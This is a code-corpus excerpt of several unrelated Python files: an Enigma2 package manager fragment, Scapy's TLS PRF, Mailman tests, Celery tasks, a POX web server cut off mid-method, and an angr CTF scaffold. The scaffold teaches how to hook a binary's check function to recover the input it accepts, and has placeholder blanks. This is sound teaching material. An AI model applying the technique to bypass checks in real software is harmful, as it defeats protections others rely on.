return((name, version, _(description), state, installedpng, divpng))
elif state == 'upgradeable':
upgradeablepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgradeable.png"))
return((name, version, _(description), state, upgradeablepng, divpng))
else:
installablepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installable.png"))
return((name, version, _(description), state, installablepng, divpng))
def buildPacketList(self):
self.list = []
self.cachelist = []
if self.cache_ttl > 0 and self.vc != 0:
print 'Loading packagelist cache from ',self.cache_file
try:
self.cachelist = load_cache(self.cache_file)
if len(self.cachelist) > 0:
for x in self.cachelist:
self.list.append(self.buildEntryComponent(x[0], x[1], x[2], x[3]))
self['list'].setList(self.list)
except:
self.inv_cache = 1
if self.cache_ttl == 0 or self.inv_cache == 1 or self.vc == 0:
print 'rebuilding fresh package list'
for x in self.packetlist:
status = ""
if self.installed_packetlist.has_key(x[0]):
if self.upgradeable_packages.has_key(x[0]):
status = "upgradeable"
else:
status = "installed"
else:
status = "installable"
self.list.append(self.buildEntryComponent(x[0], x[1], x[2], status))
self.cachelist.append([x[0], x[1], x[2], status])
write_cache(self.cache_file, self.cachelist)
self['list'].setList(self.list)
def reloadPluginlist(self):
plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
class IpkgInstaller(Screen):
skin = """
<screen name="IpkgInstaller" position="center,center" size="550,450" title="Install extensions" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
<widget name="list" position="5,50" size="540,360" />
<ePixmap pixmap="skin_default/div-h.png" position="0,410" zPosition="10" size="560,2" transparent="1" alphatest="on" />
<widget source="introduction" render="Label" position="5,420" zPosition="10" size="550,30" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, list):
Screen.__init__(self, session)
self.list = SelectionList()
self["list"] = self.list
for listindex in range(len(list)):
self.list.addSelection(list[listindex], list[listindex], listindex, False)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Install"))
self["key_yellow"] = StaticText()
self["key_blue"] = StaticText(_("Invert"))
self["introduction"] = StaticText(_("Press OK to toggle the selection."))
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.list.toggleSelection,
"cancel": self.close,
"red": self.close,
"green": self.install,
"blue": self.list.toggleAllSelection
}, -1)
def install(self):
list = self.list.getSelectionsList()
cmdList = []
for item in list:
cmdList.append((IpkgComponent.CMD_INSTALL, { "package": item[1] }))
self.session.open(Ipkg, cmdList = cmdList)
def filescan_open(list, session, **kwargs):
filelist = [x.path for x in list]
session.open(IpkgInstaller, filelist) # list
def filescan(**kwargs):
from Components.Scanner import Scanner, ScanPath
return \
Scanner(mimetypes = ["application/x-debian-package"],
paths_to_scan =
[
ScanPath(path = "ipk", with_subdirs = True),
ScanPath(path = "", with_subdirs = False),
],
name = "Ipkg",
description = _("Install extensions."),
openfnc = filescan_open, )
def UpgradeMain(session, **kwargs):
session.open(UpdatePluginMenu)
def startSetup(menuid):
if menuid == "setup" and config.plugins.softwaremanager.onSetupMenu.value:
return [(_("Software management"), UpgradeMain, "software_manager", 50)]
return [ ]
def Plugins(path, **kwargs):
global plugin_path
plugin_path = path
list = [
PluginDescriptor(name=_("Software management"), description=_("Manage your receiver's software"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc=startSetup),
PluginDescriptor(name=_("Ipkg"), where = PluginDescriptor.WHERE_FILESCAN, needsRestart = False, fnc = filescan)
]
if not config.plugins.softwaremanager.onSetupMenu.value and not config.plugins.softwaremanager.onBlueButton.value:
list.append(PluginDescriptor(name=_("Software management"), description=_("Manage your receiver's software"), where = PluginDescriptor.WHERE_PLUGINMENU, needsRestart = False, fnc=UpgradeMain))
if config.plugins.softwaremanager.onBlueButton.value:
list.append(PluginDescriptor(name=_("Software management"), description=_("Manage your receiver's software"), where = PluginDescriptor.WHERE_EXTENSIONSMENU, needsRestart = False, fnc=UpgradeMain))
return list
| vit2/vit-e2 | lib/python/Plugins/SystemPlugins/SoftwareManager/plugin.py | Python | gpl-2.0 | 81,553 |
# This file is part of Scapy
# Copyright (C) 2007, 2008, 2009 Arnaud Ebalard
# 2015, 2016, 2017 Maxence Tury
# This program is published under a GPLv2 license
"""
TLS Pseudorandom Function.
"""
from __future__ import absolute_import
from scapy.error import warning
from scapy.utils import strxor
from scapy.layers.tls.crypto.hash import _tls_hash_algs
from scapy.layers.tls.crypto.h_mac import _tls_hmac_algs
from scapy.modules.six.moves import range
from scapy.compat import bytes_encode
# Data expansion functions
def _tls_P_hash(secret, seed, req_len, hm):
"""
Provides the implementation of P_hash function defined in
section 5 of RFC 4346 (and section 5 of RFC 5246). Two
parameters have been added (hm and req_len):
- secret : the key to be used. If RFC 4868 is to be believed,
the length must match hm.key_len. Actually,
python hmac takes care of formatting every key.
- seed : the seed to be used.
- req_len : the length of data to be generated by iterating
the specific HMAC function (hm). This prevents
multiple calls to the function.
- hm : the hmac function class to use for iteration (either
Hmac_MD5 or Hmac_SHA1 in TLS <= 1.1 or
Hmac_SHA256 or Hmac_SHA384 in TLS 1.2)
"""
hash_len = hm.hash_alg.hash_len
n = (req_len + hash_len - 1) // hash_len
seed = bytes_encode(seed)
res = b""
a = hm(secret).digest(seed) # A(1)
while n > 0:
res += hm(secret).digest(a + seed)
a = hm(secret).digest(a)
n -= 1
return res[:req_len]
def _tls_P_MD5(secret, seed, req_len):
return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-MD5"])
def _tls_P_SHA1(secret, seed, req_len):
return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA"])
def _tls_P_SHA256(secret, seed, req_len):
return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA256"])
def _tls_P_SHA384(secret, seed, req_len):
return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA384"])
def _tls_P_SHA512(secret, seed, req_len):
return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA512"])
# PRF functions, according to the protocol version
def _sslv2_PRF(secret, seed, req_len):
hash_md5 = _tls_hash_algs["MD5"]()
rounds = (req_len + hash_md5.hash_len - 1) // hash_md5.hash_len
res = b""
if rounds == 1:
res += hash_md5.digest(secret + seed)
else:
r = 0
while r < rounds:
label = str(r).encode("utf8")
res += hash_md5.digest(secret + label + seed)
r += 1
return res[:req_len]
def _ssl_PRF(secret, seed, req_len):
"""
Provides the implementation of SSLv3 PRF function:
SSLv3-PRF(secret, seed) =
MD5(secret || SHA-1("A" || secret || seed)) ||
MD5(secret || SHA-1("BB" || secret || seed)) ||
MD5(secret || SHA-1("CCC" || secret || seed)) || ...
req_len should not be more than 26 x 16 = 416.
"""
if req_len > 416:
warning("_ssl_PRF() is not expected to provide more than 416 bytes")
return ""
d = [b"A", b"B", b"C", b"D", b"E", b"F", b"G", b"H", b"I", b"J", b"K", b"L", # noqa: E501
b"M", b"N", b"O", b"P", b"Q", b"R", b"S", b"T", b"U", b"V", b"W", b"X", # noqa: E501
b"Y", b"Z"]
res = b""
hash_sha1 = _tls_hash_algs["SHA"]()
hash_md5 = _tls_hash_algs["MD5"]()
rounds = (req_len + hash_md5.hash_len - 1) // hash_md5.hash_len
for i in range(rounds):
label = d[i] * (i + 1)
tmp = hash_sha1.digest(label + secret + seed)
res += hash_md5.digest(secret + tmp)
return res[:req_len]
def _tls_PRF(secret, label, seed, req_len):
"""
Provides the implementation of TLS PRF function as defined in
section 5 of RFC 4346:
PRF(secret, label, seed) = P_MD5(S1, label + seed) XOR
P_SHA-1(S2, label + seed)
Parameters are:
- secret: the secret used by the HMAC in the 2 expansion
functions (S1 and S2 are the halves of this secret).
- label: specific label as defined in various sections of the RFC
depending on the use of the generated PRF keystream
- seed: the seed used by the expansion functions.
- req_len: amount of keystream to be generated
"""
tmp_len = (len(secret) + 1) // 2
S1 = secret[:tmp_len]
S2 = secret[-tmp_len:]
a1 = _tls_P_MD5(S1, label + seed, req_len)
a2 = _tls_P_SHA1(S2, label + seed, req_len)
return strxor(a1, a2)
def _tls12_SHA256PRF(secret, label, seed, req_len):
"""
Provides the implementation of TLS 1.2 PRF function as
defined in section 5 of RFC 5246:
PRF(secret, label, seed) = P_SHA256(secret, label + seed)
Parameters are:
- secret: the secret used by the HMAC in the 2 expansion
functions (S1 and S2 are the halves of this secret).
- label: specific label as defined in various sections of the RFC
depending on the use of the generated PRF keystream
- seed: the seed used by the expansion functions.
- req_len: amount of keystream to be generated
"""
return _tls_P_SHA256(secret, label + seed, req_len)
def _tls12_SHA384PRF(secret, label, seed, req_len):
return _tls_P_SHA384(secret, label + seed, req_len)
def _tls12_SHA512PRF(secret, label, seed, req_len):
return _tls_P_SHA512(secret, label + seed, req_len)
class PRF(object):
"""
The PRF used by SSL/TLS varies based on the version of the protocol and
(for TLS 1.2) possibly the Hash algorithm of the negotiated cipher suite.
The various uses of the PRF (key derivation, computation of verify_data,
computation of pre_master_secret values) for the different versions of the
protocol also changes. In order to abstract those elements, the common
_tls_PRF() object is provided. It is expected to be initialised in the
context of the connection state using the tls_version and the cipher suite.
"""
def __init__(self, hash_name="SHA256", tls_version=0x0303):
self.tls_version = tls_version
self.hash_name = hash_name
if tls_version < 0x0300: # SSLv2
self.prf = _sslv2_PRF
elif tls_version == 0x0300: # SSLv3
self.prf = _ssl_PRF
elif (tls_version == 0x0301 or # TLS 1.0
tls_version == 0x0302): # TLS 1.1
self.prf = _tls_PRF
elif tls_version == 0x0303: # TLS 1.2
if hash_name == "SHA384":
self.prf = _tls12_SHA384PRF
elif hash_name == "SHA512":
self.prf = _tls12_SHA512PRF
else:
if hash_name in ["MD5", "SHA"]:
self.hash_name = "SHA256"
self.prf = _tls12_SHA256PRF
else:
warning("Unknown TLS version")
def compute_master_secret(self, pre_master_secret, client_random,
server_random, extms=False, handshake_hash=None):
"""
Return the 48-byte master_secret, computed from pre_master_secret,
client_random and server_random. See RFC 5246, section 6.3.
Supports Extended Master Secret Derivation, see RFC 7627
"""
seed = client_random + server_random
label = b'master secret'
if extms is True and handshake_hash is not None:
seed = handshake_hash
label = b'extended master secret'
if self.tls_version < 0x0300:
return None
elif self.tls_version == 0x0300:
return self.prf(pre_master_secret, seed, 48)
else:
return self.prf(pre_master_secret, label, seed, 48)
def derive_key_block(self, master_secret, server_random,
client_random, req_len):
"""
Perform the derivation of master_secret into a key_block of req_len
requested length. See RFC 5246, section 6.3.
"""
seed = server_random + client_random
if self.tls_version <= 0x0300:
return self.prf(master_secret, seed, req_len)
else:
return self.prf(master_secret, b"key expansion", seed, req_len)
def compute_verify_data(self, con_end, read_or_write,
handshake_msg, master_secret):
"""
Return verify_data based on handshake messages, connection end,
master secret, and read_or_write position. See RFC 5246, section 7.4.9.
Every TLS 1.2 cipher suite has a verify_data of length 12. Note also::
"This PRF with the SHA-256 hash function is used for all cipher
suites defined in this document and in TLS documents published
prior to this document when TLS 1.2 is negotiated."
Cipher suites using SHA-384 were defined later on.
"""
if self.tls_version < 0x0300:
return None
elif self.tls_version == 0x0300:
if read_or_write == "write":
d = {"client": b"CLNT", "server": b"SRVR"}
else:
d = {"client": b"SRVR", "server": b"CLNT"}
label = d[con_end]
sslv3_md5_pad1 = b"\x36" * 48
sslv3_md5_pad2 = b"\x5c" * 48
sslv3_sha1_pad1 = b"\x36" * 40
sslv3_sha1_pad2 = b"\x5c" * 40
md5 = _tls_hash_algs["MD5"]()
sha1 = _tls_hash_algs["SHA"]()
md5_hash = md5.digest(master_secret + sslv3_md5_pad2 +
md5.digest(handshake_msg + label +
master_secret + sslv3_md5_pad1))
sha1_hash = sha1.digest(master_secret + sslv3_sha1_pad2 +
sha1.digest(handshake_msg + label +
master_secret + sslv3_sha1_pad1)) # noqa: E501
verify_data = md5_hash + sha1_hash
else:
if read_or_write == "write":
d = {"client": "client", "server": "server"}
else:
d = {"client": "server", "server": "client"}
label = ("%s finished" % d[con_end]).encode()
if self.tls_version <= 0x0302:
s1 = _tls_hash_algs["MD5"]().digest(handshake_msg)
s2 = _tls_hash_algs["SHA"]().digest(handshake_msg)
verify_data = self.prf(master_secret, label, s1 + s2, 12)
else:
h = _tls_hash_algs[self.hash_name]()
s = h.digest(handshake_msg)
verify_data = self.prf(master_secret, label, s, 12)
return verify_data
def postprocess_key_for_export(self, key, client_random, server_random,
con_end, read_or_write, req_len):
"""
Postprocess cipher key for EXPORT ciphersuite, i.e. weakens it.
An export key generation example is given in section 6.3.1 of RFC 2246.
See also page 86 of EKR's book.
"""
s = con_end + read_or_write
s = (s == "clientwrite" or s == "serverread")
if self.tls_version < 0x0300:
return None
elif self.tls_version == 0x0300:
if s:
tbh = key + client_random + server_random
else:
tbh = key + server_random + client_random
export_key = _tls_hash_algs["MD5"]().digest(tbh)[:req_len]
else:
if s:
tag = b"client write key"
else:
tag = b"server write key"
export_key = self.prf(key,
tag,
client_random + server_random,
req_len)
return export_key
def generate_iv_for_export(self, client_random, server_random,
con_end, read_or_write, req_len):
"""
Generate IV for EXPORT ciphersuite, i.e. weakens it.
An export IV generation example is given in section 6.3.1 of RFC 2246.
See also page 86 of EKR's book.
"""
s = con_end + read_or_write
s = (s == "clientwrite" or s == "serverread")
if self.tls_version < 0x0300:
return None
elif self.tls_version == 0x0300:
if s:
tbh = client_random + server_random
else:
tbh = server_random + client_random
iv = _tls_hash_algs["MD5"]().digest(tbh)[:req_len]
else:
iv_block = self.prf("",
b"IV block",
client_random + server_random,
2 * req_len)
if s:
iv = iv_block[:req_len]
else:
iv = iv_block[req_len:]
return iv
| gpotter2/scapy | scapy/layers/tls/crypto/prf.py | Python | gpl-2.0 | 12,924 |
# Copyright (C) 2015 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""API version tests."""
__all__ = [
'TestAPIVersion',
]
import unittest
from mailman.core.system import system
from mailman.testing.helpers import call_api
from mailman.testing.layers import RESTLayer
from urllib.error import HTTPError
class TestAPIVersion(unittest.TestCase):
layer = RESTLayer
def test_api_31(self):
# API version 3.1 was introduced in Mailman 3.1.
url = 'http://localhost:9001/3.1/system'
new = '{}/versions'.format(url)
json, response = call_api(url)
self.assertEqual(json['mailman_version'], system.mailman_version)
self.assertEqual(json['python_version'], system.python_version)
self.assertEqual(json['api_version'], '3.1')
self.assertEqual(json['self_link'], new)
def test_api_30(self):
# API version 3.0 is still supported.
url = 'http://localhost:9001/3.0/system'
new = '{}/versions'.format(url)
json, response = call_api(url)
self.assertEqual(json['mailman_version'], system.mailman_version)
self.assertEqual(json['python_version'], system.python_version)
self.assertEqual(json['api_version'], '3.0')
self.assertEqual(json['self_link'], new)
def test_bad_api(self):
# There is no API version earlier than 3.0.
with self.assertRaises(HTTPError) as cm:
call_api('http://localhost:9001/2.9/system')
self.assertEqual(cm.exception.code, 404)
| khushboo9293/mailman | src/mailman/rest/tests/test_api.py | Python | gpl-3.0 | 2,194 |
# This challenge is similar to the previous one. It operates under the same
# premise that you will have to replace the check_equals_ function. In this
# case, however, check_equals_ is called so many times that it wouldn't make
# sense to hook where each one was called. Instead, use a SimProcedure to write
# your own check_equals_ implementation and then hook the check_equals_ symbol
# to replace all calls to scanf with a call to your SimProcedure.
#
# You may be thinking:
# Why can't I just use hooks? The function is called many times, but if I hook
# the address of the function itself (rather than the addresses where it is
# called), I can replace its behavior everywhere. Furthermore, I can get the
# parameters by reading them off the stack (with memory.load(regs.esp + xx)),
# and return a value by simply setting eax! Since I know the length of the
# function in bytes, I can return from the hook just before the 'ret'
# instruction is called, which will allow the program to jump back to where it
# was before it called my hook.
# If you thought that, then congratulations! You have just invented the idea of
# SimProcedures! Instead of doing all of that by hand, you can let the already-
# implemented SimProcedures do the boring work for you so that you can focus on
# writing a replacement function in a Pythonic way.
# As a bonus, SimProcedures allow you to specify custom calling conventions, but
# unfortunately it is not covered in this CTF.
import angr
import claripy
import sys
def main(argv):
path_to_binary = argv[1]
project = angr.Project(path_to_binary)
initial_state = project.factory.entry_state()
# Define a class that inherits angr.SimProcedure in order to take advantage
# of Angr's SimProcedures.
class ReplacementCheckEquals(angr.SimProcedure):
# A SimProcedure replaces a function in the binary with a simulated one
# written in Python. Other than it being written in Python, the function
# acts largely the same as any function written in C. Any parameter after
# 'self' will be treated as a parameter to the function you are replacing.
# The parameters will be bitvectors. Additionally, the Python can return in
# the ususal Pythonic way. Angr will treat this in the same way it would
# treat a native function in the binary returning. An example:
#
# int add_if_positive(int a, int b) {
# if (a >= 0 && b >= 0) return a + b;
# else return 0;
# }
#
# could be simulated with...
#
# class ReplacementAddIfPositive(angr.SimProcedure):
# def run(self, a, b):
# if a >= 0 and b >=0:
# return a + b
# else:
# return 0
#
# Finish the parameters to the check_equals_ function. Reminder:
# int check_equals_AABBCCDDEEFFGGHH(char* to_check, int length) { ...
# (!)
def run(self, to_check, ...???):
# We can almost copy and paste the solution from the previous challenge.
# Hint: Don't look up the address! It's passed as a parameter.
# (!)
user_input_buffer_address = ???
user_input_buffer_length = ???
# Note the use of self.state to find the state of the system in a
# SimProcedure.
user_input_string = self.state.memory.load(
user_input_buffer_address,
user_input_buffer_length
)
check_against_string = ???
# Finally, instead of setting eax, we can use a Pythonic return statement
# to return the output of this function.
# Hint: Look at the previous solution.
return claripy.If(???, ???, ???)
# Hook the check_equals symbol. Angr automatically looks up the address
# associated with the symbol. Alternatively, you can use 'hook' instead
# of 'hook_symbol' and specify the address of the function. To find the
# correct symbol, disassemble the binary.
# (!)
check_equals_symbol = ??? # :string
project.hook_symbol(check_equals_symbol, ReplacementCheckEquals())
simulation = project.factory.simgr(initial_state)
def is_successful(state):
stdout_output = state.posix.dumps(sys.stdout.fileno())
return ???
def should_abort(state):
stdout_output = state.posix.dumps(sys.stdout.fileno())
return ???
simulation.explore(find=is_successful, avoid=should_abort)
if simulation.found:
solution_state = simulation.found[0]
solution = ???
print solution
else:
raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
| cliffe/SecGen | modules/utilities/unix/ctf/metactf/files/repository/src_angr/dist/scaffold10.py | Python | gpl-3.0 | 4,519 |
from __future__ import absolute_import, unicode_literals
from .celery import app
@app.task
def add(x, y):
return x + y
@app.task
def mul(x, y):
return x * y
@app.task
def xsum(numbers):
return sum(numbers)
| ginolhac/tutorials | python/advanced/celery/code/ulhpccelery/tasks.py | Python | gpl-3.0 | 224 |
# Copyright 2011,2012 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Webcore is a basic web server framework based on the SocketServer-based
BaseHTTPServer that comes with Python. The big difference is that this
one can carve up URL-space by prefix, such that "/foo/*" gets handled by
a different request handler than "/bar/*". I refer to this as "splitting".
You should also be able to make a request handler written without splitting
run under Webcore. This may not work for all request handlers, but it
definitely works for some. :) The easiest way to do this is with the
wrapRequestHandler() function, like so:
from CGIHTTPServer import CGIHTTPRequestHandler as CHRH
core.WebServer.set_handler("/foo", wrapRequestHandler(CHRH))
.. now URLs under the /foo/ directory will let you browse through the
filesystem next to pox.py. If you create a cgi-bin directory next to
pox.py, you'll be able to run executables in it.
For this specific purpose, there's actually a SplitCGIRequestHandler
which demonstrates wrapping a normal request handler while also
customizing it a bit -- SplitCGIRequestHandler shoehorns in functionality
to use arbitrary base paths.
BaseHTTPServer is not very fast and needs to run on its own thread.
It'd actually be great to have a version of this written against, say,
CherryPy, but I did want to include a simple, dependency-free web solution.
"""
from SocketServer import ThreadingMixIn
from BaseHTTPServer import *
from time import sleep
import select
import threading
import random
import hashlib
import base64
from pox.core import core
import os
import posixpath
import urllib
import cgi
import errno
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
log = core.getLogger()
weblog = log.getChild("server")
def _setAttribs (parent, child):
attrs = ['command', 'request_version', 'close_connection',
'raw_requestline', 'requestline', 'path', 'headers', 'wfile',
'rfile', 'server', 'client_address']
for a in attrs:
setattr(child, a, getattr(parent, a))
setattr(child, 'parent', parent)
import SimpleHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class SplitRequestHandler (BaseHTTPRequestHandler):
"""
To write HTTP handlers for POX, inherit from this class instead of
BaseHTTPRequestHandler. The interface should be the same -- the same
variables should be set, and the same do_GET(), etc. methods should
be called.
In addition, there will be a self.args which can be specified
when you set_handler() on the server.
"""
# Also a StreamRequestHandler
def __init__ (self, parent, prefix, args):
_setAttribs(parent, self)
self.parent = parent
self.args = args
self.prefix = prefix
self._init()
def _init (self):
"""
This is called by __init__ during initialization. You can
override it to, for example, parse .args.
"""
pass
def handle_one_request (self):
raise RuntimeError("Not supported")
def handle(self):
raise RuntimeError("Not supported")
def _split_dispatch (self, command, handler = None):
if handler is None: handler = self
mname = 'do_' + self.command
if not hasattr(handler, mname):
self.send_error(501, "Unsupported method (%r)" % self.command)
return
method = getattr(handler, mname)
return method()
def log_request (self, code = '-', size = '-'):
weblog.debug(self.prefix + (':"%s" %s %s' %
(self.requestline, str(code), str(size))))
def log_error (self, fmt, *args):
weblog.error(self.prefix + ':' + (fmt % args))
def log_message (self, fmt, *args):
weblog.info(self.prefix + ':' + (fmt % args))
_favicon = ("47494638396110001000c206006a5797927bc18f83ada9a1bfb49ceabda"
+ "4f4ffffffffffff21f904010a0007002c000000001000100000034578badcfe30b20"
+ "1c038d4e27a0f2004e081e2172a4051942abba260309ea6b805ab501581ae3129d90"
+ "1275c6404b80a72f5abcd4a2454cb334dbd9e58e74693b97425e07002003b")
_favicon = ''.join([chr(int(_favicon[n:n+2],16))
for n in xrange(0,len(_favicon),2)])
class CoreHandler (SplitRequestHandler):
"""
A default page to say hi from POX.
"""
def do_GET (self):
"""Serve a GET request."""
self.do_content(True)
def do_HEAD (self):
"""Serve a HEAD request."""
self.do_content(False)
def do_content (self, is_get):
if self.path == "/":
self.send_info(is_get)
elif self.path.startswith("/favicon."):
self.send_favicon(is_get)
else:
self.send_error(404, "File not found on CoreHandler")
def send_favicon (self, is_get = False):
self.send_response(200)
self.send_header("Content-type", "image/gif")
self.send_header("Content-Length", str(len(_favicon)))
self.end_headers()
if is_get:
self.wfile.write(_favicon)
def send_info (self, is_get = False):
r = "<html><head><title>POX</title></head>\n"
r += "<body>\n<h1>POX Webserver</h1>\n<h2>Components</h2>\n"
r += "<ul>"
for k in sorted(core.components):
v = core.components[k]
r += "<li>%s - %s</li>\n" % (cgi.escape(str(k)), cgi.escape(str(v)))
r += "</ul>\n\n<h2>Web Prefixes</h2>"
r += "<ul>"
m = [map(cgi.escape, map(str, [x[0],x[1],x[3]]))
for x in self.args.matches]
m.sort()
for v in m:
r += "<li><a href='{0}'>{0}</a> - {1} {2}</li>\n".format(*v)
r += "</ul></body></html>\n"
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(len(r)))
self.end_headers()
if is_get:
self.wfile.write(r)
class StaticContentHandler (SplitRequestHandler, SimpleHTTPRequestHandler):
# We slightly modify SimpleHTTPRequestHandler to serve from given
# directories and inherit from from Python, but
# modified to serve from given directories and to inherit from
# SplitRequestHandler.
"""
A SplitRequestHandler for serving static content
This is largely the same as the Python SimpleHTTPRequestHandler, but
we modify it to serve from arbitrary directories at arbitrary
positions in the URL space.
"""
server_version = "StaticContentHandler/1.0"
def send_head (self):
# We override this and handle the directory redirection case because
# we want to include the per-split prefix.
path = self.translate_path(self.path)
if os.path.isdir(path):
if not self.path.endswith('/'):
self.send_response(301)
self.send_header("Location", self.prefix + self.path + "/")
self.end_headers()
return None
return SimpleHTTPRequestHandler.send_head(self)
def list_directory (self, dirpath):
# dirpath is an OS path
try:
d = os.listdir(dirpath)
except OSError as e:
if e.errno == errno.EACCES:
self.send_error(403, "This directory is not listable")
elif e.errno == errno.ENOENT:
self.send_error(404, "This directory does not exist")
else:
self.send_error(400, "Unknown error")
return None
d.sort(key=str.lower)
r = StringIO()
r.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\n")
path = posixpath.join(self.prefix, cgi.escape(self.path).lstrip("/"))
r.write("<html><head><title>" + path + "</title></head>\n")
r.write("<body><pre>")
parts = path.rstrip("/").split("/")
r.write('<a href="/">/</a>')
for i,part in enumerate(parts):
link = urllib.quote("/".join(parts[:i+1]))
if i > 0: part += "/"
r.write('<a href="%s">%s</a>' % (link, cgi.escape(part)))
r.write("\n" + "-" * (0+len(path)) + "\n")
dirs = []
files = []
for f in d:
if f.startswith("."): continue
if os.path.isdir(os.path.join(dirpath, f)):
dirs.append(f)
else:
files.append(f)
def entry (n, rest=''):
link = urllib.quote(n)
name = cgi.escape(n)
r.write('<a href="%s">%s</a>\n' % (link,name+rest))
for f in dirs:
entry(f, "/")
for f in files:
entry(f)
r.write("</pre></body></html>")
r.seek(0)
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(r.getvalue())))
self.end_headers()
return r
def translate_path (self, path, include_prefix = True):
"""
Translate a web-path to a local filesystem path
Odd path elements (e.g., ones that contain local filesystem path
separators) are stripped.
"""
def fixpath (p):
o = []
skip = 0
while True:
p,tail = posixpath.split(p)
if p in ('/','') and tail == '': break
if tail in ('','.', os.path.curdir, os.path.pardir): continue
if os.path.sep in tail: continue
if os.path.altsep and os.path.altsep in tail: continue
if os.path.splitdrive(tail)[0] != '': continue
if tail == '..':
skip += 1
continue
if skip:
skip -= 1
continue
o.append(tail)
o.reverse()
return o
# Remove query string / fragment
if "?" in path: path = path[:path.index("?")]
if "#" in path: path = path[:path.index("#")]
path = fixpath(path)
if path:
path = os.path.join(*path)
else:
path = ''
if include_prefix:
path = os.path.join(os.path.abspath(self.args['root']), path)
return path
def wrapRequestHandler (handlerClass):
return type("Split" + handlerClass.__name__,
(SplitRequestHandler, handlerClass, object), {})
from CGIHTTPServer import CGIHTTPRequestHandler
class SplitCGIRequestHandler (SplitRequestHandler,
CGIHTTPRequestHandler, object):
"""
Runs CGIRequestHandler serving from an arbitrary path.
This really should be a feature of CGIRequestHandler and the way of
implementing it here is scary and awful, but it at least sort of works.
"""
__lock = threading.Lock()
def _split_dispatch (self, command):
with self.__lock:
olddir = os.getcwd()
try:
os.chdir(self.args)
return SplitRequestHandler._split_dispatch(self, command)
finally:
os.chdir(olddir)
class SplitterRequestHandler (BaseHTTPRequestHandler):
def __init__ (self, *args, **kw):
#self.rec = Recording(args[0])
#self.args = args
#self.matches = self.matches.sort(key=lambda e:len(e[0]),reverse=True)
#BaseHTTPRequestHandler.__init__(self, self.rec, *args[1:], **kw)
BaseHTTPRequestHandler.__init__(self, *args, **kw)
def log_request (self, code = '-', size = '-'):
weblog.debug('splitter:"%s" %s %s',
self.requestline, str(code), str(size))
def log_error (self, fmt, *args):
weblog.error('splitter:' + fmt % args)
def log_message (self, fmt, *args):
weblog.info('splitter:' + fmt % args)
def handle_one_request(self):
self.raw_requestline = self.rfile.readline()
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request(): # An error code has been sent, just exit
return
handler = None
while True:
for m in self.server.matches:
if self.path.startswith(m[0]):
#print m,self.path
handler = m[1](self, m[0], m[3])
#pb = self.rec.getPlayback()
#handler = m[1](pb, *self.args[1:])
_setAttribs(self, handler)
if m[2]:
# Trim. Behavior is not "perfect"
handler.path = self.path[len(m[0]):]
if m[0].endswith('/'):
handler.path = '/' + handler.path
break
if handler is None:
handler = self
if not self.path.endswith('/'):
# Handle splits like directories
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
break
break
return handler._split_dispatch(self.command)
class SplitThreadedServer(ThreadingMixIn, HTTPServer):
matches = [] # Tuples of (Prefix, TrimPrefix, Handler)
# def __init__ (self, *args, **kw):
# BaseHTTPRequestHandler.__init__(self, *args, **kw)
# self.matches = self.matches.sort(key=lambda e:len(e[0]),reverse=True)
def set_handler (self, prefix, handler, args = None, trim_prefix = True):
# Not very efficient
assert (handler is None) or (issubclass(handler, SplitRequestHandler))
self.matches = [m for m in self.matches if m[0] != prefix]
